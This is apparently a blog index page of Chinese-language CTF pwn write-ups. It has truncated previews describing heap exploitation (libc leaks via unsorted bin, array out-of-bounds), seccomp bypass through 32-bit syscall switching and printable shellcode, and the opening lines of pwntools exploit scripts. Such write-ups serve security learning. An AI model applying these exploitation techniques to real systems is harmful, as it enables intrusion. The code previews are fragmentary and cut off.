Blog of cat03

paper思路 泄露libc 当fastbin里没有合适的，在unsorted bin内分割，从而遗留了fd bk 漏洞点在 论文查重有个数组越界 还有一种泄露environ的方式解题 这道题某些功能逻辑生硬 就不留附件了意义 exp1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631 ...

lonelywolf附件attachment exp12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273#!/usr/bin/env python from pwn import *context.log_level = "debug"p = process("./lonelywolf")elf = ELF("./lonelywolf")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")def malloc(size): p.recvuntil("choice: ") p.sendline("1") p.recvuntil("Index: ") p.sendline("0" ...

seccomp规则值得注意的是 没有检查架构 没有检查sys_num是否越界 只有read,没有write 有系统调用号为5的 可切换到32位open 思路 可打印的shellcode1 完成read() jmp 接着就能控制执行流 用汇编边写边调 完成在 32bit open 64bit write 延时爆破 EXP看了几个大佬的exp 复写了这个 因为这个exp条件要求低，更可控，会把参考的大佬内容放在下面 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321 ...

exp附件放下边了 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253#!/usr/bin/env pythonfrom pwn import *context.log_level = 'debug'context.arch = 'amd64'context.os = 'linux'p = process("./pwn")def add(index,size,content): p.recvuntil("choice >>\n") p.sendline("1") p.recvuntil("index:\n") p.sendline(str(index)) p.recvuntil("size:\n") p.sendline(str(size)) p.recvuntil(&quo ...